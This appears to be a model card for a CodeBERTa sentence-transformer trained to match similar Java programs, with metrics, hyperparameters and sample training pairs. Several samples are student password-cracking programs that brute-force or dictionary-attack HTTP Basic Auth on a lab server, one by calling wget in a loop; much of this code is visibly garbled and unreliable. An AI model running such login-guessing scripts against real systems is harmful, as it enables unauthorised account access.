\n \n int temp1=0;\n int temp2=0;\n int temp3=0;\n\n\n \
\ \n \n \n for (int a=1; a<=passwordLen; a++) {\n temp1\
\ = (int) Math.pow(lettersLen, a);\n passwords += temp1;\n if\
\ (a==2) {\n twoChar = temp1; \n }\n }\n\n System.out.println(\"\
Brute Attack \" + host + \" has commenced.\");\n System.out.println(\"Number\
\ of possible password combinations: \" + passwords);\n\n\n int i=1; \n\n\
\ {\n try {\n \n URL url = new URL(host);\n\
\ HttpURLConnection httpConnect = (HttpURLConnection) url.openConnection();\n\
\n \n if(realm != null) {\n\n \n \
\ if ( i < lettersLen) {\n \n\n password\
\ = letters.substring(i, (i+1));\n\n } else if (i < (lettersLen\
\ + twoChar)) {\n \n\n \n \
\ temp1 = i / lettersLen;\n password = letters.substring((-1),\
\ start );\n\n \n temp1 = i - ( temp1 * lettersLen);\n\
\ password = password + letters.substring(temp1, (+1));\n\n\
\ } else {\n \n\n \n \
\ temp2 = i / lettersLen;\n temp1 = i - (temp2 *\
\ lettersLen);\n password = letters.substring(temp1, (+1));\n\
\n \n temp3 = temp2; \n \
\ temp2 = temp2 / lettersLen;\n temp1 = temp3 - (temp2 * lettersLen);\n\
\ password = letters.substring(temp1, (+1)) + password;\n\n\
\ \n temp3 = temp2; \n temp2\
\ = temp2 / lettersLen;\n temp1 = temp3 - (temp2 * lettersLen);\n\
\ password = letters.substring(temp1, (+1)) + password;\n\n\
\ } \n\n \n \n authenticate\
\ = username + \":\" + password;\n authenticate = new String(base.encode(authenticate.getBytes()));\n\
\ httpConnect.addRequestProperty(\"Authorization\", \" \" + authenticate);\n\
\n } \n\n \n httpConnect.connect();\n\n \
\ \n realm = httpConnect.getHeaderField(\"WWW-Authenticate\"\
);\n if (realm != null) {\n realm = realm.substring(realm.indexOf('\"\
') + 1);\n realm = realm.substring(0, realm.indexOf('\"'));\n \
\ }\n\n hostname = url.getHost();\n\n \n \
\ responseCode = httpConnect.getResponseCode();\n responseMsg\
\ = httpConnect.getResponseMessage();\n\n \n \n \
\ \n \n \n\n \n \n if\
\ (responseCode == 200) {\n \n end = System.currentTimeMillis();\n\
\ total = (end - start) / 1000; \n\n System.out.println\
\ (\"Sucessfully Connected \" + url);\n System.out.println(\"Login\
\ Attempts Required : \" + (i-1));\n System.out.println(\"Time Taken\
\ in Seconds : \" + total);\n System.out.println (\"Connection Status\
\ : \" + responseCode + \" \" + responseMsg);\n System.out.println\
\ (\"Username : \" + username);\n System.out.println (\"Password\
\ : \" + password);\n System.exit( 0 );\n } else if (responseCode\
\ == 401 && realm != null) {\n \n \n \
\ \n if (i > 1) {\n\n }\n } else {\n \
\ \n \n System.out.println (\"What the?...\
\ The server replied with unexpected reponse.\" );\n System.out.println\
\ (\" Unexpected Error Occured While Attempting Connect \" + url);\n \
\ System.out.println (\"Connection Status: \" + responseCode + responseMsg);\n\
\ System.out.println (\"Unfortunately the password could not recovered.\"\
);\n System.exit( 0 );\n }\n\n i++;\n\n \
\ } catch(MalformedURLException e) {\n System.out.println(\"Opps,\
\ the URL \" + host + \" is not valid.\");\n System.out.println(\"Please\
\ check the URL and try again.\");\n } catch(IOException e) {\n \
\ System.out.println(\", 't connect \" + host + \".\");\n System.out.println(\"\
Please check the URL and try again.\");\n System.out.println(\"Other\
\ possible causes include website is currently unavailable\");\n System.out.println(\"\
\ have internet connection problem.\");\n } \n\n } while(realm !=\
\ null); \n\n\n }\n}"
pipeline_tag: sentence-similarity
library_name: sentence-transformers
metrics:
- cosine_accuracy
- cosine_accuracy_threshold
- cosine_f1
- cosine_f1_threshold
- cosine_precision
- cosine_recall
- cosine_ap
- cosine_mcc
model-index:
- name: SentenceTransformer based on huggingface/CodeBERTa-small-v1
results:
- task:
type: binary-classification
name: Binary Classification
dataset:
name: binary classification evaluator
type: binary-classification-evaluator
metrics:
- type: cosine_accuracy
value: 0.999534450651769
name: Cosine Accuracy
- type: cosine_accuracy_threshold
value: 0.8751956224441528
name: Cosine Accuracy Threshold
- type: cosine_f1
value: 0.9995346672871103
name: Cosine F1
- type: cosine_f1_threshold
value: 0.8751956224441528
name: Cosine F1 Threshold
- type: cosine_precision
value: 0.9990697674418605
name: Cosine Precision
- type: cosine_recall
value: 1.0
name: Cosine Recall
- type: cosine_ap
value: 0.9999512493871627
name: Cosine Ap
- type: cosine_mcc
value: 0.9990693343726054
name: Cosine Mcc
---
# SentenceTransformer based on huggingface/CodeBERTa-small-v1
This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [huggingface/CodeBERTa-small-v1](https://huggingface.co/huggingface/CodeBERTa-small-v1). It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
## Model Details
### Model Description
- **Model Type:** Sentence Transformer
- **Base model:** [huggingface/CodeBERTa-small-v1](https://huggingface.co/huggingface/CodeBERTa-small-v1) <!-- at revision e93b5898cff07f03f1c1c09cde284d1b85962363 -->
- **Maximum Sequence Length:** 512 tokens
- **Output Dimensionality:** 768 dimensions
- **Similarity Function:** Cosine Similarity
<!-- - **Training Dataset:** Unknown -->
<!-- - **Language:** Unknown -->
<!-- - **License:** Unknown -->
### Model Sources
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
### Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False, 'architecture': 'RobertaModel'})
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
```
## Usage
### Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
```bash
pip install -U sentence-transformers
```
Then you can load this model and run inference.
```python
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-CODEBERTA-CONTRASTIVE-PAIRS-E1-B16-LR2e-05-Split0.1")
# Run inference
sentences = [
'\n\nimport java.io.*;\nimport java.net.*;\nimport java.misc.BASE64Encoder;\n\npublic class Dictionary\n{\n public Dictionary()\n {}\n\n public boolean fetchURL(String urlString,String username,String password)\n {\n StringWriter sw= new StringWriter();\n PrintWriter pw = new PrintWriter();\n try{\n URL url=new URL(urlString); \n String userPwd= username+":"+password;\n\n \n \n \n \n\n BASE64Encoder encoder = new BASE64Encoder();\n String encodedStr = encoder.encode (userPwd.getBytes());\n System.out.println("Original String = " + userPwd);\n\t System.out.println("Encoded String = " + encodedStr);\n\n HttpURLConnection huc=(HttpURLConnection) url.openConnection(); \n huc.setRequestProperty( "Authorization"," "+encodedStr); \n InputStream content = (InputStream)huc.getInputStream();\n BufferedReader in =\n new BufferedReader (new InputStreamReader (content));\n String line;\n while ((line = in.readLine()) != null) {\n pw.println (line);\n System.out.println("");\n System.out.println(sw.toString());\n }return true;\n } catch (MalformedURLException e) {\n pw.println ("Invalid URL");\n return false;\n } catch (IOException e) {\n pw.println ("Error URL");\n return false;\n }\n\n }\n\n public void getPassword()\n {\n String dictionary="words";\n String urlString="http://sec-crack.cs.rmit.edu./SEC/2/";\n String login="";\n String pwd=" ";\n\n try\n {\n BufferedReader inputStream=new BufferedReader(new FileReader(dictionary));\n startTime=System.currentTimeMillis();\n while (pwd!=null)\n {\n pwd=inputStream.readLine();\n if(this.fetchURL(urlString,login,pwd))\n {\n finishTime=System.currentTimeMillis();\n System.out.println("Finally I gotta it, password is : "+pwd);\n System.out.println("The time for cracking password is: "+(finishTime-startTime) + " milliseconds");\n System.exit(1);\n } \n\n }\n inputStream.close();\n }\n catch(FileNotFoundException e)\n {\n System.out.println("Dictionary not found.");\n }\n catch(IOException e)\n {\n System.out.println("Error dictionary");\n }\n }\n\n public static void main(String[] arguments)\n {\n BruteForce bf=new BruteForce();\n bf.getPassword();\n } \n}',
'\n\nimport java.io.*;\nimport java.*;\n\npublic class BruteForce \n{\n public static void main(String args[]) \n {\n String s = null;\n String basic_url = "http://sec-crack.cs.rmit.edu./SEC/2/";\n\n \n String alphabets = new String("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ");\n \n String password = null;\n int len = 0;\n int num_tries = 0;\n\n len = alphabets.length();\n \n \n for (int i=0; i<len; i++)\n {\n for (int j=0; j<len; j++)\n\t {\n for (int k=0; k<len; k++)\n\t {\n try \n {\n \n password = String.valueOf(alphabets.charAt(i)) + String.valueOf(alphabets.charAt(j)) + String.valueOf(alphabets.charAt(k));\n \n System.out.print(alphabets.charAt(i)); \n System.out.print(alphabets.charAt(j)); \n System.out.println(alphabets.charAt(k)); \n\n \n Process p = Runtime.getRuntime().exec("wget --http-user= --http-passwd=" + password + " " + basic_url);\n \n BufferedReader stdInput = new BufferedReader(new \n InputStreamReader(p.getInputStream()));\n\n BufferedReader stdError = new BufferedReader(new \n InputStreamReader(p.getErrorStream()));\n\n \n while ((s = stdInput.readLine()) != null)\n {\n System.out.println(s);\n }\n \n \n while ((s = stdError.readLine()) != null)\n {\n System.out.println(s);\n }\n \n try\n\t\t {\n p.waitFor(); \n }\n catch (InterruptedException g) \n {\n } \n\n num_tries++;\n \n if((p.exitValue()) == 0)\n { \n System.out.println("**********PASSWORD IS: " + password);\n\t System.out.println("**********NUMBER OF TRIES: " + num_tries);\n System.exit(1);\n }\n }\n catch (IOException e)\n {\n System.out.println("exception happened - here\'s what I know: ");\n e.printStackTrace();\n System.exit(-1);\n }\n }\n }\n }\n }\n}\n\n',
'\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nimport java.io.*;\nimport java.net.*;\nimport java.net.URL;\nimport java.net.URLConnection;\nimport java.util.*;\n\npublic class BruteForce {\n\n public static void main(String[] args) throws IOException {\n\n \n int start , end, total;\n start = System.currentTimeMillis(); \n\n String username = "";\n String password = null;\n String host = "http://sec-crack.cs.rmit.edu./SEC/2/";\n\n \n \n String letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";\n int lettersLen = letters.length(); \n int passwordLen=3; \n\n int passwords=0; \n int twoChar=0; \n\n url.misc.BASE64Encoder base = new url.misc.BASE64Encoder();\n \n\n \n String authenticate = ""; \n String realm = null, domain = null, hostname = null;\n header = null; \n\n \n int responseCode;\n String responseMsg;\n\n \n int temp1=0;\n int temp2=0;\n int temp3=0;\n\n\n \n \n \n for (int a=1; a<=passwordLen; a++) {\n temp1 = (int) Math.pow(lettersLen, a);\n passwords += temp1;\n if (a==2) {\n twoChar = temp1; \n }\n }\n\n System.out.println("Brute Attack " + host + " has commenced.");\n System.out.println("Number of possible password combinations: " + passwords);\n\n\n int i=1; \n\n {\n try {\n \n URL url = new URL(host);\n HttpURLConnection httpConnect = (HttpURLConnection) url.openConnection();\n\n \n if(realm != null) {\n\n \n if ( i < lettersLen) {\n \n\n password = letters.substring(i, (i+1));\n\n } else if (i < (lettersLen + twoChar)) {\n \n\n \n temp1 = i / lettersLen;\n password = letters.substring((-1), start );\n\n \n temp1 = i - ( temp1 * lettersLen);\n password = password + letters.substring(temp1, (+1));\n\n } else {\n \n\n \n temp2 = i / lettersLen;\n temp1 = i - (temp2 * lettersLen);\n password = letters.substring(temp1, (+1));\n\n \n temp3 = temp2; \n temp2 = temp2 / lettersLen;\n temp1 = temp3 - (temp2 * lettersLen);\n password = letters.substring(temp1, (+1)) + password;\n\n \n temp3 = temp2; \n temp2 = temp2 / lettersLen;\n temp1 = temp3 - (temp2 * lettersLen);\n password = letters.substring(temp1, (+1)) + password;\n\n } \n\n \n \n authenticate = username + ":" + password;\n authenticate = new String(base.encode(authenticate.getBytes()));\n httpConnect.addRequestProperty("Authorization", " " + authenticate);\n\n } \n\n \n httpConnect.connect();\n\n \n realm = httpConnect.getHeaderField("WWW-Authenticate");\n if (realm != null) {\n realm = realm.substring(realm.indexOf(\'"\') + 1);\n realm = realm.substring(0, realm.indexOf(\'"\'));\n }\n\n hostname = url.getHost();\n\n \n responseCode = httpConnect.getResponseCode();\n responseMsg = httpConnect.getResponseMessage();\n\n \n \n \n \n \n\n \n \n if (responseCode == 200) {\n \n end = System.currentTimeMillis();\n total = (end - start) / 1000; \n\n System.out.println ("Sucessfully Connected " + url);\n System.out.println("Login Attempts Required : " + (i-1));\n System.out.println("Time Taken in Seconds : " + total);\n System.out.println ("Connection Status : " + responseCode + " " + responseMsg);\n System.out.println ("Username : " + username);\n System.out.println ("Password : " + password);\n System.exit( 0 );\n } else if (responseCode == 401 && realm != null) {\n \n \n \n if (i > 1) {\n\n }\n } else {\n \n \n System.out.println ("What the?... The server replied with unexpected reponse." );\n System.out.println (" Unexpected Error Occured While Attempting Connect " + url);\n System.out.println ("Connection Status: " + responseCode + responseMsg);\n System.out.println ("Unfortunately the password could not recovered.");\n System.exit( 0 );\n }\n\n i++;\n\n } catch(MalformedURLException e) {\n System.out.println("Opps, the URL " + host + " is not valid.");\n System.out.println("Please check the URL and try again.");\n } catch(IOException e) {\n System.out.println(", \'t connect " + host + ".");\n System.out.println("Please check the URL and try again.");\n System.out.println("Other possible causes include website is currently unavailable");\n System.out.println(" have internet connection problem.");\n } \n\n } while(realm != null); \n\n\n }\n}',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities)
# tensor([[1.0000, 0.2589, 0.2759],
# [0.2589, 1.0000, 0.2076],
# [0.2759, 0.2076, 1.0000]])
```
<!--
### Direct Usage (Transformers)
<details><summary>Click to see the direct usage in Transformers</summary>
</details>
-->
<!--
### Downstream Usage (Sentence Transformers)
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
</details>
-->
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
## Evaluation
### Metrics
#### Binary Classification
* Dataset: `binary-classification-evaluator`
* Evaluated with [<code>BinaryClassificationEvaluator</code>](https://sbert.net/docs/package_reference/sentence_transformer/evaluation.html#sentence_transformers.evaluation.BinaryClassificationEvaluator)
| Metric | Value |
|:--------------------------|:--------|
| cosine_accuracy | 0.9995 |
| cosine_accuracy_threshold | 0.8752 |
| cosine_f1 | 0.9995 |
| cosine_f1_threshold | 0.8752 |
| cosine_precision | 0.9991 |
| cosine_recall | 1.0 |
| **cosine_ap** | **1.0** |
| cosine_mcc | 0.9991 |
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Dataset
#### Unnamed Dataset
* Size: 77,328 training samples
* Columns: <code>text_1</code>, <code>text_2</code>, and <code>label</code>
* Approximate statistics based on the first 1000 samples:
| | text_1 | text_2 | label |
|:--------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|:------------------------------------------------|
| type | string | string | int |
| details | <ul><li>min: 51 tokens</li><li>mean: 467.45 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 464.45 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>0: ~50.00%</li><li>1: ~50.00%</li></ul> |
* Samples:
| text_1 | text_2 | label |
|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------|
| <code><br><br>import java.io.*;<br>import java.net.*;<br>import java.misc.BASE64Encoder;<br><br>public class Dictionary<br>{<br> public Dictionary()<br> {}<br><br> public boolean fetchURL(String urlString,String username,String password)<br> {<br> StringWriter sw= new StringWriter();<br> PrintWriter pw = new PrintWriter();<br> try{<br> URL url=new URL(urlString); <br> String userPwd= username+":"+password;<br><br> <br> <br> <br> <br><br> BASE64Encoder encoder = new BASE64Encoder();<br> String encodedStr = encoder.encode (userPwd.getBytes());<br> System.out.println("Original String = " + userPwd);<br> System.out.println("Encoded String = " + encodedStr);<br><br> HttpURLConnection huc=(HttpURLConnection) url.openConnection(); <br> huc.setRequestProperty( "Authorization"," "+encodedStr); <br> InputStream content = (InputStream)huc.getInputStream();<br> BufferedReader in =<br> new BufferedReader (new InputStreamReader (content));<br> String line;<br> while ((line = in.readLine())...</code> | <code><br><br>import java.io.*;<br>import java.net.*;<br>import java.misc.BASE64Encoder;<br><br>public class BruteForce<br>{<br> public BruteForce()<br> {}<br><br> public boolean fetchURL(String urlString,String username,String password)<br> {<br> StringWriter = new StringWriter();<br> PrintWriter pw = new PrintWriter();<br> try{<br> URL url=new URL(urlString); <br> String userPwd= username+":"+password;<br><br> <br> <br> <br> <br><br> BASE64Encoder encoder = new BASE64Encoder();<br> String encodedStr = encoder.encode (userPwd.getBytes());<br> System.out.println("Original String = " + userPwd);<br> System.out.println("Encoded String = " + encodedStr);<br><br> HttpURLConnection huc=(HttpURLConnection) url.openConnection(); <br> huc.setRequestProperty( "Authorization"," "+encodedStr); <br> InputStream content = (InputStream)huc.getInputStream();<br> BufferedReader in = <br> new BufferedReader (new InputStreamReader (content));<br> String line;<br> while ((line = in.readLine()) ...</code> | <code>1</code> |
| <code><br><br>import java.io.*;<br>import java.net.*;<br>import java.misc.BASE64Encoder;<br><br>public class Dictionary<br>{<br> public Dictionary()<br> {}<br><br> public boolean fetchURL(String urlString,String username,String password)<br> {<br> StringWriter sw= new StringWriter();<br> PrintWriter pw = new PrintWriter();<br> try{<br> URL url=new URL(urlString); <br> String userPwd= username+":"+password;<br><br> <br> <br> <br> <br><br> BASE64Encoder encoder = new BASE64Encoder();<br> String encodedStr = encoder.encode (userPwd.getBytes());<br> System.out.println("Original String = " + userPwd);<br> System.out.println("Encoded String = " + encodedStr);<br><br> HttpURLConnection huc=(HttpURLConnection) url.openConnection(); <br> huc.setRequestProperty( "Authorization"," "+encodedStr); <br> InputStream content = (InputStream)huc.getInputStream();<br> BufferedReader in =<br> new BufferedReader (new InputStreamReader (content));<br> String line;<br> while ((line = in.readLine())...</code> | <code><br><br>import java.net.*;<br>import java.io.*;<br>import java.util.*;<br><br>public class Dictionary{<br><br> private static URL location;<br> private static String user;<br> private BufferedReader input;<br> private static BufferedReader dictionary;<br> private int maxLetters = 3;<br><br> <br><br> public Dictionary() {<br> <br> Authenticator.setDefault(new MyAuthenticator ());<br><br> startTime = System.currentTimeMillis();<br> boolean passwordMatched = false;<br> while (!passwordMatched) {<br> try {<br> input = new BufferedReader(new InputStreamReader(location.openStream()));<br> String line = input.readLine();<br> while (line != null) {<br> System.out.println(line);<br> line = input.readLine();<br> }<br> input.close();<br> passwordMatched = true;<br> }<br> catch (ProtocolException e)<br> {<br> <br> <br> }<br> catch (ConnectException e) {<br> System.out.println("Failed connect");<br> }<br> catch (IOException e) ...</code> | <code>0</code> |
| <code><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br><br>public class WatchdogPropertyHelper {<br><br> private static Properties testProps;<br><br><br><br> public WatchdogPropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the watchddog Props");<br> e.printStackTrace();<br> }<br> return testProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(testProps == null){<br> testProps = new Properties();<br><br> InputStream fis =<br> WatchdogPropertyHelper.class.getResourceAsStream("/watchdog.properties");<br> testProps.load(fis);<br> }<br> }<br>}<br></code> | <code><br><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br>public class BruteForcePropertyHelper {<br><br> private static Properties bruteForceProps;<br><br><br><br> public BruteForcePropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the burteforce Props");<br> e.printStackTrace();<br> }<br> return bruteForceProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(bruteForceProps == null){<br> bruteForceProps = new Properties();<br><br> InputStream fis =<br> BruteForcePropertyHelper.class.getResourceAsStream("/bruteforce.properties");<br> bruteForceProps.load(fis);<br> }<br> }<br>}<br><br></code> | <code>1</code> |
* Loss: [<code>ContrastiveLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#contrastiveloss) with these parameters:
```json
{
"distance_metric": "SiameseDistanceMetric.COSINE_DISTANCE",
"margin": 0.5,
"size_average": true
}
```
### Evaluation Dataset
#### Unnamed Dataset
* Size: 8,592 evaluation samples
* Columns: <code>text_1</code>, <code>text_2</code>, and <code>label</code>
* Approximate statistics based on the first 1000 samples:
| | text_1 | text_2 | label |
|:--------|:------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|:------------------------------------------------|
| type | string | string | int |
| details | <ul><li>min: 51 tokens</li><li>mean: 469.8 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 461.39 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>0: ~50.00%</li><li>1: ~50.00%</li></ul> |
* Samples:
| text_1 | text_2 | label |
|:----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------|
| <code><br><br><br><br><br><br>import java.util.*;<br>import java.io.*;<br><br>public class WatchDog<br>{ <br><br> public static void main(String args[])<br> {<br><br> Runtime rt1 = Runtime.getRuntime();<br> Process prss1= null;<br><br> try<br> {<br> prss1 = rt1.exec("wget -R mpg,mpeg, --output-document=first.html http://www.cs.rmit.edu./students/");<br> }catch(java.io.IOException e){}<br><br> MyWatchDogTimer w = new MyWatchDogTimer();<br> Timer time = new Timer();<br> time.schedule(w,864000000,864000000);<br><br> <br> }<br>}<br></code> | <code> <br><br><br><br><br>import java.util.*;<br>import java.io.*;<br><br>public class MyTimer<br>{ <br><br> public static void main(String args[])<br> {<br> Watchdog watch = new Watchdog();<br> Timer time = new Timer();<br> time.schedule(watch,864000000,864000000);<br> <br> <br> }<br>}<br></code> | <code>1</code> |
| <code><br><br><br><br><br><br>import java.util.*;<br>import java.io.*;<br><br>public class WatchDog<br>{ <br><br> public static void main(String args[])<br> {<br><br> Runtime rt1 = Runtime.getRuntime();<br> Process prss1= null;<br><br> try<br> {<br> prss1 = rt1.exec("wget -R mpg,mpeg, --output-document=first.html http://www.cs.rmit.edu./students/");<br> }catch(java.io.IOException e){}<br><br> MyWatchDogTimer w = new MyWatchDogTimer();<br> Timer time = new Timer();<br> time.schedule(w,864000000,864000000);<br><br> <br> }<br>}<br></code> | <code>import java.net.*; <br>import java.io.*; <br>import java.util.Vector;<br>import java.util.Date;<br>import java.security.*;<br><br><br><br><br><br><br><br><br><br><br><br> <br>public class Dictionary { <br> public static BufferedReader in;<br> <br> <br> public static void main(String[] args) throws Exception { <br> String baseURL = "http://sec-crack.cs.rmit.edu./SEC/2/index.php"; <br> int count=0;<br> Date date = new Date();<br> startTime=date.getTime();<br> int LIMITINMINUTES=45;<br> int TIMELIMIT=LIMITINMINUTES*1000*60;<br> boolean timedOut=false;<br> boolean found=false;<br> <br> <br> Vector dictionary=new Vector(readWords());<br> System.out.println("Words in dictionary: "+dictionary.size());<br> <br> <br> <br> <br> <br> <br> <br> while (found==false && timedOut==false && dictionary.elementAt(count)!=null) {<br> <br> Date endDate = new Date();<br> endTime=endDate.getTime(); <br> if (endTime>(TIMELIMIT+startTime)){<br> System.out.println("Timed out");<br> timedOut=true;<br> }<br> <br> String password = "";<br><br> ...</code> | <code>0</code> |
| <code><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br><br><br>public class MailsendPropertyHelper {<br><br> private static Properties testProps;<br><br> public MailsendPropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the watchddog Props");<br> e.printStackTrace();<br> }<br> return testProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(testProps == null){<br> testProps = new Properties();<br><br> InputStream fis =<br> MailsendPropertyHelper.class.getResourceAsStream("/mailsend.properties");<br> testProps.load(fis);<br> }<br> }<br>}<br><br><br><br><br><br></code> | <code><br><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br>public class BruteForcePropertyHelper {<br><br> private static Properties bruteForceProps;<br><br><br><br> public BruteForcePropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the burteforce Props");<br> e.printStackTrace();<br> }<br> return bruteForceProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(bruteForceProps == null){<br> bruteForceProps = new Properties();<br><br> InputStream fis =<br> BruteForcePropertyHelper.class.getResourceAsStream("/bruteforce.properties");<br> bruteForceProps.load(fis);<br> }<br> }<br>}<br><br></code> | <code>1</code> |
* Loss: [<code>ContrastiveLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#contrastiveloss) with these parameters:
```json
{
"distance_metric": "SiameseDistanceMetric.COSINE_DISTANCE",
"margin": 0.5,
"size_average": true
}
```
### Training Hyperparameters
#### Non-Default Hyperparameters
- `eval_strategy`: steps
- `per_device_train_batch_size`: 16
- `per_device_eval_batch_size`: 16
- `learning_rate`: 2e-05
- `num_train_epochs`: 1
- `warmup_ratio`: 0.1
- `fp16`: True
- `batch_sampler`: no_duplicates
#### All Hyperparameters
<details><summary>Click to expand</summary>
- `overwrite_output_dir`: False
- `do_predict`: False
- `eval_strategy`: steps
- `prediction_loss_only`: True
- `per_device_train_batch_size`: 16
- `per_device_eval_batch_size`: 16
- `per_gpu_train_batch_size`: None
- `per_gpu_eval_batch_size`: None
- `gradient_accumulation_steps`: 1
- `eval_accumulation_steps`: None
- `torch_empty_cache_steps`: None
- `learning_rate`: 2e-05
- `weight_decay`: 0.0
- `adam_beta1`: 0.9
- `adam_beta2`: 0.999
- `adam_epsilon`: 1e-08
- `max_grad_norm`: 1.0
- `num_train_epochs`: 1
- `max_steps`: -1
- `lr_scheduler_type`: linear
- `lr_scheduler_kwargs`: {}
- `warmup_ratio`: 0.1
- `warmup_steps`: 0
- `log_level`: passive
- `log_level_replica`: warning
- `log_on_each_node`: True
- `logging_nan_inf_filter`: True
- `save_safetensors`: True
- `save_on_each_node`: False
- `save_only_model`: False
- `restore_callback_states_from_checkpoint`: False
- `no_cuda`: False
- `use_cpu`: False
- `use_mps_device`: False
- `seed`: 42
- `data_seed`: None
- `jit_mode_eval`: False
- `use_ipex`: False
- `bf16`: False
- `fp16`: True
- `fp16_opt_level`: O1
- `half_precision_backend`: auto
- `bf16_full_eval`: False
- `fp16_full_eval`: False
- `tf32`: None
- `local_rank`: 0
- `ddp_backend`: None
- `tpu_num_cores`: None
- `tpu_metrics_debug`: False
- `debug`: []
- `dataloader_drop_last`: False
- `dataloader_num_workers`: 0
- `dataloader_prefetch_factor`: None
- `past_index`: -1
- `disable_tqdm`: False
- `remove_unused_columns`: True
- `label_names`: None
- `load_best_model_at_end`: False
- `ignore_data_skip`: False
- `fsdp`: []
- `fsdp_min_num_params`: 0
- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- `fsdp_transformer_layer_cls_to_wrap`: None
- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- `parallelism_config`: None
- `deepspeed`: None
- `label_smoothing_factor`: 0.0
- `optim`: adamw_torch_fused
- `optim_args`: None
- `adafactor`: False
- `group_by_length`: False
- `length_column_name`: length
